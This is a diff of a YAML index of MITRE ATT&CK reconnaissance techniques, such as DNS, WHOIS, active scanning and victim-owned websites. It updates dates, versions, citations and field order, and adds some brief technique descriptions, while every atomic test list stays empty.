         Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
@@ -54292,8 +54967,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.005:
     technique:
@@ -54321,7 +54994,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:31:05.302Z'
       name: IP Addresses
       description: |-
         Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
@@ -54337,33 +55010,33 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.002:
     technique:
-      modified: '2022-10-21T14:32:48.393Z'
+      modified: '2024-11-11T16:13:02.196Z'
       name: DNS
       description: |-
-        Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
+        Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
 
         Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+        Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.2'
       type: attack-pattern
       id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea
       created: '2020-10-02T15:47:10.102Z'
@@ -54377,18 +55050,29 @@ reconnaissance:
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
         url: https://www.circl.lu/services/passive-dns/
+      - source_name: DNS-CISA
+        description: CISA. (2016, September 29). DNS Zone Transfer AXFR Requests May
+          Leak Domain Information. Retrieved June 5, 2024.
+        url: https://www.cisa.gov/news-events/alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domain-information
       - source_name: DNS Dumpster
         description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
         url: https://dnsdumpster.com/
+      - source_name: Alexa-dns
+        description: Scanning Alexa's Top 1M for AXFR. (2015, March 29). Retrieved
+          June 5, 2024.
+        url: https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/
       - source_name: Sean Metcalf Twitter DNS Records
         description: Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved
-          May 27, 2022.
-        url: https://twitter.com/PyroTek3/status/1126487227712921600/photo/1
+          September 12, 2024.
+        url: https://x.com/PyroTek3/status/1126487227712921600
+      - source_name: Trails-DNS
+        description: SecurityTrails. (2018, March 14). Wrong Bind Configuration Exposes
+          the Complete List of Russian TLD's to the Internet. Retrieved June 5, 2024.
+        url: https://web.archive.org/web/20180615055527/https://securitytrails.com/blog/russian-tlds
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596.002:
     technique:
@@ -54409,7 +55093,7 @@ reconnaissance:
       - source_name: WHOIS
         url: https://www.whois.net/
         description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:50:44.113Z'
       name: WHOIS
       description: |-
         Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
@@ -54425,39 +55109,37 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1594:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
-      type: attack-pattern
-      created: '2020-10-02T16:51:50.306Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1594
-        url: https://attack.mitre.org/techniques/T1594
-      - source_name: Comparitech Leak
-        url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
-        description: Bischoff, P. (2020, October 15). Broadvoice database of more
-          than 350 million customer records exposed online. Retrieved October 20,
-          2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-02T18:52:21.278Z'
       name: Search Victim-Owned Websites
-      description: |-
-        Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
-
-        Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+      description: "Adversaries may search websites owned by the victim for information
+        that can be used during targeting. Victim-owned websites may contain a variety
+        of details, including names of departments/divisions, physical locations,
+        and data about key employees such as names, roles, and contact info (ex: [Email
+        Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may
+        also have details highlighting business operations and relationships.(Citation:
+        Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather
+        actionable information. Information from these sources may reveal opportunities
+        for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+        or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+        establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)
+        or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or
+        initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)
+        or [Phishing](https://attack.mitre.org/techniques/T1566)).\n\nIn addition
+        to manually browsing the website, adversaries may attempt to identify hidden
+        directories or files that could contain additional sensitive information or
+        vulnerable functionality. They may do this through automated activities such
+        as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as
+        well as by leveraging files such as sitemap.xml and robots.txt.(Citation:
+        Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - James P Callahan, Professional Paranoid
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for suspicious network traffic that could be indicative
         of adversary reconnaissance, such as rapid successions of requests indicative
         of web crawling and/or large quantities of requests originating from a single
@@ -54465,13 +55147,41 @@ reconnaissance:
         Analyzing web metadata may also reveal artifacts that can be attributed to
         potentially malicious activity, such as referer or user-agent string HTTP/S
         fields.
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
+      created: '2020-10-02T16:51:50.306Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1594
+        external_id: T1594
+      - source_name: Perez Sitemap XML 2023
+        description: Adi Perez. (2023, February 22). How Attackers Can Misuse Sitemaps
+          to Enumerate Users and Discover Sensitive Information. Retrieved July 18,
+          2024.
+        url: https://medium.com/@adimenia/how-attackers-can-misuse-sitemaps-to-enumerate-users-and-discover-sensitive-information-361a5065857a
+      - source_name: Comparitech Leak
+        description: Bischoff, P. (2020, October 15). Broadvoice database of more
+          than 350 million customer records exposed online. Retrieved October 20,
+          2020.
+        url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
+      - source_name: Register Robots TXT 2015
+        description: Darren Pauli. (2015, May 19). Robots.txt tells hackers the places
+          you don't want them to look. Retrieved July 18, 2024.
+        url: https://www.theregister.com/2015/05/19/robotstxt/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1596.001:
     technique:
@@ -54496,7 +55206,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:49:13.409Z'
       name: DNS/Passive DNS
       description: |-
         Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
@@ -54512,8 +55222,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.003:
     technique:
@@ -54535,7 +55243,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:38:31.983Z'
       name: Identify Business Tempo
       description: |-
         Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
@@ -54551,8 +55259,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.001:
     technique:
@@ -54578,7 +55284,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:32:10.810Z'
       name: 'Gather Victim Host Information: Hardware'
       description: |-
         Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
@@ -54596,13 +55302,11 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1592.001
     atomic_tests: []
   T1598.003:
     technique:
-      modified: '2024-04-19T13:26:16.082Z'
+      modified: '2024-05-31T04:18:44.567Z'
       name: Spearphishing Link
       description: |-
         Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -54658,7 +55362,7 @@ reconnaissance:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: TrendMictro Phishing
         description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
           October 20, 2020.
@@ -54709,7 +55413,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1590.004:
     technique:
@@ -54730,7 +55433,7 @@ reconnaissance:
       - source_name: DNS Dumpster
         url: https://dnsdumpster.com/
         description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:33:02.476Z'
       name: Network Topology
       description: |-
         Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
@@ -54746,8 +55449,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.003:
     technique:
@@ -54769,7 +55470,7 @@ reconnaissance:
         url: https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019
         description: García, C. (2019, April 3). Pentesting Active Directory Forests.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:34:22.917Z'
       name: Network Trust Dependencies
       description: |-
         Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
@@ -54785,8 +55486,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1597.001:
     technique:
@@ -54808,7 +55507,7 @@ reconnaissance:
         url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
         description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
           Intelligence Feeds. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:45:30.862Z'
       name: Threat Intel Vendors
       description: |-
         Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
@@ -54824,12 +55523,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589:
     technique:
-      modified: '2024-04-19T04:27:00.005Z'
+      modified: '2024-09-16T16:09:45.794Z'
       name: Gather Victim Identity Information
       description: |-
         Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.
@@ -54869,8 +55566,8 @@ reconnaissance:
         external_id: T1589
       - source_name: OPM Leak
         description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
-          Retrieved October 20, 2020.
-        url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+          Retrieved September 16, 2024.
+        url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
       - source_name: Detectify Slack Tokens
         description: Detectify. (2016, April 28). Slack bot token leakage exposing
           business critical information. Retrieved October 19, 2020.
@@ -54915,11 +55612,10 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:37:31.317Z'
       name: Vulnerability Scanning
       description: |-
         Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
@@ -54959,9 +55655,8 @@ reconnaissance:
         url: https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596:
     technique:
@@ -55023,7 +55718,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595:
     technique:
@@ -55049,7 +55743,7 @@ reconnaissance:
         url: https://wiki.owasp.org/index.php/OAT-004_Fingerprinting
         description: OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved
           October 20, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T20:58:13.661Z'
       name: Active Scanning
       description: |-
         Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
@@ -55070,8 +55764,6 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589.002:
     technique:
@@ -55136,7 +55828,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1598.004:
     technique:
@@ -55184,7 +55875,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1590.006:
     technique:
@@ -55206,7 +55896,7 @@ reconnaissance:
         url: https://nmap.org/book/firewalls.html
         description: Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls
           and Intrusion Detection Systems. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:31:54.275Z'
       name: Network Security Appliances
       description: |-
         Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
@@ -55222,34 +55912,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
-      type: attack-pattern
-      created: '2020-10-02T16:50:12.809Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1593.002
-        url: https://attack.mitre.org/techniques/T1593/002
-      - source_name: SecurityTrails Google Hacking
-        url: https://securitytrails.com/blog/google-hacking-techniques
-        description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
-          Retrieved October 20, 2020.
-      - source_name: ExploitDB GoogleHacking
-        url: https://www.exploit-db.com/google-hacking-database
-        description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
-          October 23, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T19:19:47.758Z'
       name: Search Engines
       description: |-
         Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -55258,15 +55924,38 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.0'
+      type: attack-pattern
+      id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
+      created: '2020-10-02T16:50:12.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1593/002
+        external_id: T1593.002
+      - source_name: SecurityTrails Google Hacking
+        description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+          Retrieved September 12, 2024.
+        url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
+      - source_name: ExploitDB GoogleHacking
+        description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+          October 23, 2020.
+        url: https://www.exploit-db.com/google-hacking-database
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.002:
     technique:
@@ -55288,7 +55977,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:36:58.964Z'
       name: Business Relationships
       description: |-
         Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
@@ -55304,8 +55993,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.003:
     technique:
@@ -55366,29 +56053,10 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1589.003:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
-      type: attack-pattern
-      created: '2020-10-02T14:57:15.906Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1589.003
-        url: https://attack.mitre.org/techniques/T1589/003
-      - source_name: OPM Leak
-        url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
-        description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
-          Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:09:45.795Z'
       name: Employee Names
       description: |-
         Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
@@ -55397,15 +56065,34 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.0'
+      type: attack-pattern
+      id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
+      created: '2020-10-02T14:57:15.906Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1589/003
+        external_id: T1589.003
+      - source_name: OPM Leak
+        description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+          Retrieved September 16, 2024.
+        url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
